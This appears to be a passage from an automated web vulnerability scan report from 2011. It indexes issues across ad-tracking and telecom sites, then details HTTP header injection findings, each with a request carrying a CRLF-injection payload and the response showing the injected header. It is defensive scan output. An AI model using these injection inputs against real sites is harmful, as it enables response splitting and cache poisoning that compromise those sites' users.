19.14. http://frontier.com/AgentOrdering/customAppTabInfo/tabSetup.js
19.15. http://frontier.com/AgentOrdering/javascripts/AgentOrdering.js
19.16. http://frontier.com/AgentOrdering/javascripts/validateinteger.js
19.17. http://frontier.com/Controls/VirtualCode.ashx
19.18. http://frontier.com/Controls/VirtualCode.ashx
19.19. http://frontier.com/Js/formHelpers.js
19.20. http://frontier.com/Js/jQuery/jquery-1.4.4.min.js
19.21. http://frontier.com/Js/jQuery/jquery.maskedinput.js
19.22. http://frontier.com/Js/s_code.js
19.23. http://frontier.com/Resources/3rdParty/HBX/hbx.js
19.24. http://frontier.com/Resources/3rdParty/JQuery/jq.client.plugin.js
19.25. http://frontier.com/Resources/3rdParty/JQuery/jquery-1.4.2.min.js
19.26. http://frontier.com/Resources/3rdParty/JQuery/jquery-jtemplates.js
19.27. http://frontier.com/Resources/3rdParty/JQuery/jquery-ui.min.js
19.28. http://frontier.com/Resources/3rdParty/JQuery/jquery.json-2.2.js
19.29. http://frontier.com/images/FTRMain/frontier_Logo.jpg
19.30. http://frontier.com/images/FTRMain/gradientBox.png
19.31. http://frontier.com/images/FTRMain/small_arrow.png
19.32. http://frontier.com/images/icon_print.gif
19.33. http://frontier.com/js/jquery/jquery.numeric.js
19.34. http://static.ak.fbcdn.net/connect.php/js/FB.Share
19.35. http://static.ak.fbcdn.net/connect/xd_proxy.php
19.36. http://static.ak.fbcdn.net/connect/xd_proxy.php
19.37. http://static.ak.fbcdn.net/connect/xd_proxy.php
19.38. http://www.facebook.com/extern/login_status.php
19.39. http://www.facebook.com/extern/login_status.php
19.40. http://www.facebook.com/extern/login_status.php
19.41. http://www.facebook.com/extern/login_status.php
19.42. http://www.facebook.com/extern/login_status.php
19.43. http://www.facebook.com/extern/login_status.php
19.44. http://www.facebook.com/extern/login_status.php
19.45. http://www.facebook.com/extern/login_status.php
19.46. http://www.facebook.com/extern/login_status.php
19.47. http://www.facebook.com/extern/login_status.php
19.48. http://www.facebook.com/extern/login_status.php
19.49. http://www.facebook.com/extern/login_status.php
19.50. http://www.facebook.com/extern/login_status.php
19.51. http://www.facebook.com/extern/login_status.php
19.52. http://www.facebook.com/plugins/activity.php
19.53. http://www.facebook.com/plugins/like.php
19.54. http://www.facebook.com/plugins/like.php
19.55. http://www.facebook.com/plugins/like.php
19.56. http://www.facebook.com/plugins/like.php
19.57. http://www.facebook.com/plugins/like.php
19.58. http://www.facebook.com/plugins/like.php
19.59. http://www.facebook.com/plugins/like.php
19.60. http://www.facebook.com/plugins/like.php
19.61. http://www.facebook.com/plugins/like.php
19.62. http://www.facebook.com/plugins/like.php
19.63. http://www.facebook.com/plugins/like.php
19.64. http://www.facebook.com/plugins/like.php
19.65. http://www.facebook.com/plugins/like.php
19.66. http://www.facebook.com/plugins/like.php
19.67. http://www.facebook.com/plugins/like.php
19.68. http://www.facebook.com/plugins/likebox.php
19.69. http://www.facebook.com/plugins/likebox.php
19.70. http://www.facebook.com/plugins/likebox.php
19.71. http://www.fairpoint.com/scripts/script.js
19.72. http://www.frontier.com/Js/s_code.js
19.73. http://www.frontierhelp.com/
19.74. http://www.frontierpages.com/scripts/s_code.js
19.75. http://www.vonage.com/
19.76. http://www.vonage.com/
19.77. http://www.vonage.com/googlesearch/cluster.js
19.78. http://www.vonage.com/search.php
19.79. http://www.whitefence.com/static/Seymour.js
20. Social security numbers disclosed
21. Credit card numbers disclosed
21.1. http://ad.doubleclick.net/adj/myfitv.com/z300x250
21.2. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js
21.3. http://search.yahoo.com/search
22. Robots.txt file
22.1. http://533-rgz-601.mktoresp.com/webevents/visitWebPage
22.2. http://a.adready.com/campaign_event/impression
22.3. http://a.analytics.yahoo.com/fpc.pl
22.4. http://ad.turn.com/server/ads.htm
22.5. http://ad.yieldmanager.com/pixel
22.6. http://ads.bluelithium.com/iframe3
22.7. http://ads.pointroll.com/PortalServe/
22.8. http://adserver.teracent.net/tase/ad
22.9. http://altfarm.mediaplex.com/ad/js/3484-103250-2056-0
22.10. http://api.facebook.com/restserver.php
22.11. http://api.recaptcha.net/challenge
22.12. http://as.casalemedia.com/j
22.13. http://as1.suitesmart.com/99917/G15493.js
22.14. http://autos.yahoo.com/
22.15. http://b.scorecardresearch.com/b
22.16. http://by.optimost.com/trial/471/p/customerhomepage.58a/57/content.js
22.17. http://cdn.optmd.com/V2/80181/197812/index.html
22.18. http://cdn.turn.com/server/ddc.htm
22.19. http://citizenstelecom.112.2o7.net/b/ss/cznfrontier/1/H.22.1/s93230034164153
22.20. http://comcast-www.baynote.net/baynote/tags3/common
22.21. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard
22.22. http://ec.atdmt.com/ds/TRATR11234001/300x100/multipolicy_300x100.swf
22.23. http://ehg-verizon.hitbox.com/HG
22.24. http://espanol.vonage.com/mpel.js
22.25. http://event.rtrk.com/event/
22.26. http://finance.yahoo.com/
22.27. http://fonts.googleapis.com/css
22.28. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
22.29. http://frontier.com/winwin1
22.30. http://g-pixel.invitemedia.com/gmatcher
22.31. http://games.frontier.com/
22.32. http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp
22.33. https://go.ooma.com/activate
22.34. http://gws.maps.yahoo.com/MapImage
22.35. http://iar.worthathousandwords.com/iar.gif
22.36. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js
22.37. http://int.teracent.net/tase/int
22.38. http://integrate.112.2o7.net/dfa_echo
22.39. http://ips-invite.iperceptions.com/webValidator.aspx
22.40. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/
22.41. https://login.aptela.com/cgi/login.cgi
22.42. https://login.comcast.net/login
22.43. http://metrics.scottrade.com/b/ss/scottradecom,scottradeglobal/1/H.22.1/s98473441649693
22.44. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s95377543827053
22.45. http://movies.yahoo.com/
22.46. http://music.yahoo.com/
22.47. http://new.music.yahoo.com/
22.48. http://o.analytics.yahoo.com/fpc.pl
22.49. http://pagead2.googlesyndication.com/pagead/imgad
22.50. http://pixel.everesttech.net/2565/i
22.51. http://pixel.fetchback.com/serve/fb/pdc
22.52. http://pixel.invitemedia.com/data_sync
22.53. http://pixel.quantserve.com/api/segments.json
22.54. http://postcalc.usps.gov/WebResource.axd
22.55. http://r.casalemedia.com/r
22.56. http://realestate.yahoo.com/
22.57. http://s0.2mdn.net/1033846/mmna_i_likeable_300x250.swf
22.58. http://search.keywordblocks.com/
22.59. http://search.yahoo.com/search
22.60. http://segment-pixel.invitemedia.com/pixel
22.61. http://sensor2.suitesmart.com/sensor4.js
22.62. http://serviceo.comcast.net/b/ss/comcastdotcomprod/1/H.22.1/s91887737833894
22.63. http://servicetips.whitefence.com/
22.64. http://shopping.yahoo.com/
22.65. http://show.partners-z.com/s/show
22.66. http://sitesearch.comcast.com/static.php
22.67. http://spe.atdmt.com/ds/UXULASONYSPE/Bucky_Larson_Born_to_be_a_Star/300x250_BTBS_Dante_Yh1k.swf
22.68. http://speed.pointroll.com/PointRoll/Media/Banners/Apple/891280/dg2_300x250.jpg
22.69. http://static.ak.fbcdn.net/connect/xd_proxy.php
22.70. http://support.aptela.com:9000/tools/ResetPassword.cgi
22.71. http://t.invitemedia.com/track_imp
22.72. http://t.pointroll.com/PointRoll/Track/
22.73. http://tags.mathtag.com/view/js/
22.74. http://themes.googleusercontent.com/static/fonts/ubuntu/v1/_xyN3apAT_yRRDeqB3sPRg.woff
22.75. http://udmserve.net/udm/img.fetch
22.76. http://us.bc.yahoo.com/b
22.77. http://utdi.reachlocal.com/
22.78. http://utdi.reachlocal.net/index.html
22.79. http://video.music.yahoo.com/crossdomain.xml
22.80. http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s91730218948796
22.81. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx
22.82. http://www.aptela.com/lp2011/T2V1
22.83. http://www.burstnet.com/enlightn/8117/3E06/
22.84. http://www.comcast.com/shop/buyflow/default.ashx
22.85. https://www.comcast.com/Localization/Localize.cspx
22.86. http://www.facebook.com/plugins/like.php
22.87. http://www.frontier.com/yahoo/fy_excl2.aspx
22.88. https://www.frontier.com/AgentOrdering/Login/
22.89. http://www.google-analytics.com/siteopt.js
22.90. http://www.googleadservices.com/pagead/aclk
22.91. http://www.myfitv.com/portal/recent_tv_elastic
22.92. http://www.ooma.com/
22.93. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp
22.94. http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html
22.95. https://www.usps.com/tools/domesticratecalc/welcome.htm
22.96. http://www.vonage.com/
22.97. http://www.whitefence.com/category/home-phone/
22.98. http://www.zillow.com/app
22.99. http://www2.whitefence.com/a
22.100. http://xfinity.comcast.net/js-api/compressed/xpbar.js
23. Cacheable HTTPS response
23.1. https://login.comcast.net/myaccount/images/overlay-bg.png
23.2. https://login.comcast.net/myaccount/images/sprites/base.png
23.3. https://login.comcast.net/myaccount/images/sprites/gradient.png
23.4. https://login.comcast.net/myaccount/images/sprites/xfinity_sprite.png
23.5. https://login.comcast.net/myaccount/js/additional-methods.min.js
23.6. https://login.comcast.net/myaccount/js/jquery-1.5.2.min.js
23.7. https://login.comcast.net/myaccount/js/jquery.validate.min.js
23.8. https://login.comcast.net/myaccount/js/omniture.js
23.9. https://login.comcast.net/myaccount/js/scripts.min.js
23.10. https://login.frontier.com/webmail/
23.11. https://us.etrade.com/e/t/jumppage/viewjumppage
23.12. https://www.comcast.com/Localization/QueryCompletion.cajax
23.13. https://www.comcastsupport.com/ChatEntry/
23.14. https://www.comcastsupport.com/ChatEntry/Content/Images/favicon.ico
23.15. https://www.comcastsupport.com/ChatEntry/Content/Images/mainbg.jpg
23.16. https://www.comcastsupport.com/ChatEntry/Content/Images/start_chat.png
23.17. https://www.comcastsupport.com/ChatEntry/Content/images/menubg.jpg
23.18. https://www.comcastsupport.com/ChatEntry/Forms/Suggestions.aspx
23.19. https://www.comcastsupport.com/ChatEntry/Forms/UserForm.aspx
23.20. https://www.comcastsupport.com/ChatEntry/eHelpProxy.asmx
23.21. https://www.comcastsupport.com/ChatEntry/img/xfinity/gradient.png
23.22. https://www.comcastsupport.com/chatentry/Default.aspx
23.23. https://www.fidelity.com/welcome/200-free-trades
23.24. https://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css
23.25. https://www.frontier.com/AgentOrdering/Login/
23.26. https://www.frontier.com/AgentOrdering/Login/Default.aspx
23.27. https://www.frontier.com/BillPay/Login.aspx
23.28. https://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale
23.29. https://www.frontier.com/Shop/Login.aspx
23.30. https://www.frontiermobile.com/data/
23.31. https://www.frontiermobile.com/favicon.ico
23.32. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp
24. HTML does not specify charset
24.1. http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2
24.2. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11
24.3. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12
24.4. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396
24.5. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400
24.6. http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2
24.7. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.101
24.8. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.102
24.9. http://ad.doubleclick.net/adi/ober.frontier/$%7BSEG_IDS%7D
24.10. http://ad.doubleclick.net/adi/ober.frontier/product_119282623
24.11. http://ad.doubleclick.net/adi/ober.frontier/product_undefined
24.12. http://ad.yieldmanager.com/iframe3
24.13. http://ads.pointroll.com/PortalServe/
24.14. http://comcast-www.baynote.net/favicon.ico
24.15. http://games.frontier.com/graphics/frontier/1000/site/favicon.ico
24.16. https://login.frontier.com/webmail/
24.17. https://login.frontiermobile.com/
24.18. http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html
24.19. http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
24.20. http://pixel.invitemedia.com/data_sync
24.21. http://sensor2.suitesmart.com/sensor4.js
24.22. http://uac.advertising.com/wrapper/aceUACping.htm
24.23. https://us.etrade.com/e/t/jumppage/viewjumppage
24.24. http://view.atdmt.com/MDS/iview/346808775/direct/01
24.25. http://view.atdmt.com/TR1/iview/332867993/direct/01
24.26. http://view.atdmt.com/ULA/iview/351127232/direct/01
24.27. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
24.28. http://www.comcast.com/2go/
24.29. http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html
24.30. https://www.usps.com/tools/domesticratecalc/welcome.htm
24.31. http://www.vonage.com/googlesearch/get_results.php
24.32. http://www.websitealive9.com/2140/Visitor/vTracker_v2.asp
25. Content type incorrectly stated
25.1. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**
25.2. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**
25.3. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**
25.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**
25.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**
25.6. http://ads.yimg.com/a/a/ma/matt/yahoo_realestate_home180x40.jpeg
25.7. http://amch.questionmarket.com/adsc/d847178/33/873120/randm.js
25.8. http://beacon.dedicatednetworks.com/js/t.aspx
25.9. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1
25.10. http://cimage.adobe.com/omninav/thin_omninav2.0.4.js
25.11. http://comcast-www.baynote.net/baynote/tags3/common
25.12. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard
25.13. http://customer.comcast.com/App_Themes/Default/img/SubChannelSelected.gif
25.14. http://event.adxpose.com/event.flow
25.15. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css
25.16. http://frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale
25.17. http://frontier.my.yahoo.com/e/js
25.18. http://games.frontier.com/WebAnalysis/APP/GenerateCode.ashx
25.19. http://games.frontier.com/graphics/frontier/1000/site/favicon.ico
25.20. http://ips-invite.iperceptions.com/webValidator.aspx
25.21. https://login.comcast.net/myaccount/images/overlay-bg.png
25.22. https://login.comcast.net/myaccount/images/sprites/base.png
25.23. https://login.comcast.net/myaccount/images/sprites/gradient.png
25.24. https://login.comcast.net/myaccount/images/sprites/xfinity_sprite.png
25.25. https://login.comcast.net/myaccount/js/additional-methods.min.js
25.26. https://login.comcast.net/myaccount/js/jquery-1.5.2.min.js
25.27. https://login.comcast.net/myaccount/js/jquery.validate.min.js
25.28. https://login.comcast.net/myaccount/js/omniture.js
25.29. https://login.comcast.net/myaccount/js/scripts.min.js
25.30. http://maps.yahoo.com/services/bizloc/america/bizloc
25.31. http://new.music.yahoo.com/chartsHpJS.js
25.32. http://new.music.yahoo.com/rhap_status.html
25.33. http://new.music.yahoo.com/ymusicStayConnected/
25.34. http://pixel.fetchback.com/serve/fb/pdc
25.35. http://realestate.yahoo.com/autocomplete/cities.html
25.36. http://realestate.yahoo.com/robots.txt
25.37. http://sales.liveperson.net/hcp/html/mTag.js
25.38. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**
25.39. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**
25.40. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/59689.70851972699
25.41. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/78868.26389003545
25.42. http://sensor2.suitesmart.com/sensor4.js
25.43. http://sitesearch.comcast.com/
25.44. http://sitesearch.comcast.com/favicon.ico
25.45. http://verify.authorize.net/anetseal/images/secure90x72.gif
25.46. http://www.aptela.com/favicon.ico
25.47. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_Middle.gif
25.48. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_bottom.gif
25.49. http://www.comcast.com/MediaLibrary/1/1/Common/Images/borders/230_top.gif
25.50. https://www.comcast.com/Localization/QueryCompletion.cajax
25.51. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css
25.52. http://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale
25.53. https://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css
25.54. https://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale
25.55. http://www.ooma.com/poormanscron/run-cron-check
25.56. http://www.ooma.com/sites/all/themes/ooma/img/home_savings_bar.png
25.57. http://www.vonage.com/googlesearch/get_results.php
25.58. http://www.websitealive9.com/2140/Visitor/vTracker_v2.asp
25.59. http://www.whitefence.com/favicon.ico
26. Content type is not specified
26.1. http://ad.yieldmanager.com/st
26.2. http://ads.pointroll.com/PortalServe/
1. HTTP header injection
next
There are 47 instances of this issue:
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
1.1. http://40.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://40.xg4ken.com |
| Path: |
/media/redir.php |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 90175%0d%0a2b5c414d0be was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=85&camp=2140&affcode=kw94444&cid=13569521491&networkType=search&url[]=http%3A%2F%2Fwww.whitefence.com%2Fcategory%2Fhome-phone%2F&90175%0d%0a2b5c414d0be=1 HTTP/1.1
Host: 40.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:51:59 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d56463713%00%0D%0A1812607ce81; expires=Mon, 05-Dec-2011 11:51:59 GMT; path=/; domain=.xg4ken.com
Location: http://www.whitefence.com/category/home-phone/?90175
2b5c414d0be=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
|
1.2. http://40.xg4ken.com/media/redir.php [url[] parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://40.xg4ken.com |
| Path: |
/media/redir.php |
Issue detail
The value of the url[] request parameter is copied into the Location response header. The payload fda0b%0d%0ab73d971c7c4 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=85&camp=2140&affcode=kw94444&cid=13569521491&networkType=search&url[]=http%3A%2F%2Fwww.whitefence.com%2Fcategory%2Fhome-phone%2Ffda0b%0d%0ab73d971c7c4 HTTP/1.1
Host: 40.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:51:57 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564e4a5efed390e8f23a4fed9e9; expires=Mon, 05-Dec-2011 11:51:57 GMT; path=/; domain=.xg4ken.com
Location: http://www.whitefence.com/category/home-phone/fda0b
b73d971c7c4
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
|
1.3. http://pixel.everesttech.net/2565/c [url parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://pixel.everesttech.net |
| Path: |
/2565/c |
Issue detail
The value of the url request parameter is copied into the Location response header. The payload 6b47c%0d%0a72c5727bcc8 was submitted in the url parameter. This caused a response containing an injected HTTP header.
Request
GET /2565/c?ev_ct=d&ev_sid=54&ev_ci=1660002714&ev_ai=1660082513&ev_cri=1660643811&url=http%3A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%3Futm_source%3Dyhofin%26utm_medium%3Dpaid-banner-ads%26utm_campaign%3D120x60-QuotesBttn%26utm_content%3Dstock%3AoldGrnBlk6b47c%0d%0a72c5727bcc8 HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gglck=zqROZUBXyFQAAIdR; everest_session_v2=AXNOZhaIGXMAAIM3; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:34 GMT
Server: Apache
Set-Cookie: everest_session_v2=AXNOZhaIGXMAAIM3160904156a23c7e8c69dff72; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR16090415e6ca9e4734959b1; path=/; domain=.everesttech.net; expires=Tue, 10-Sep-2030 23:28:34 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Location: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk6b47c
72c5727bcc8
Content-Length: 382
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://landing.optionshouse.com/rate/395/yhofin
...[SNIP]...
|
1.4. http://redirect.rtrk.com/redirect [RL_ckstr parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://redirect.rtrk.com |
| Path: |
/redirect |
Issue detail
The value of the RL_ckstr request parameter is copied into the Set-Cookie response header. The payload 116f0%0d%0afc7a19355f0 was submitted in the RL_ckstr parameter. This caused a response containing an injected HTTP header.
Request
GET /redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26rl_key%3De2e30c5686d91c3f4971163361e1b86a%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0116f0%0d%0afc7a19355f0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:48 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0116f0
fc7a19355f0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Vary: Accept-Encoding
Content-Length: 587
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:41 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.reachlocal.com/coupon/?scid=2323693
...[SNIP]...
|
1.5. http://redirect.rtrk.com/redirect [RL_qstr parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://redirect.rtrk.com |
| Path: |
/redirect |
Issue detail
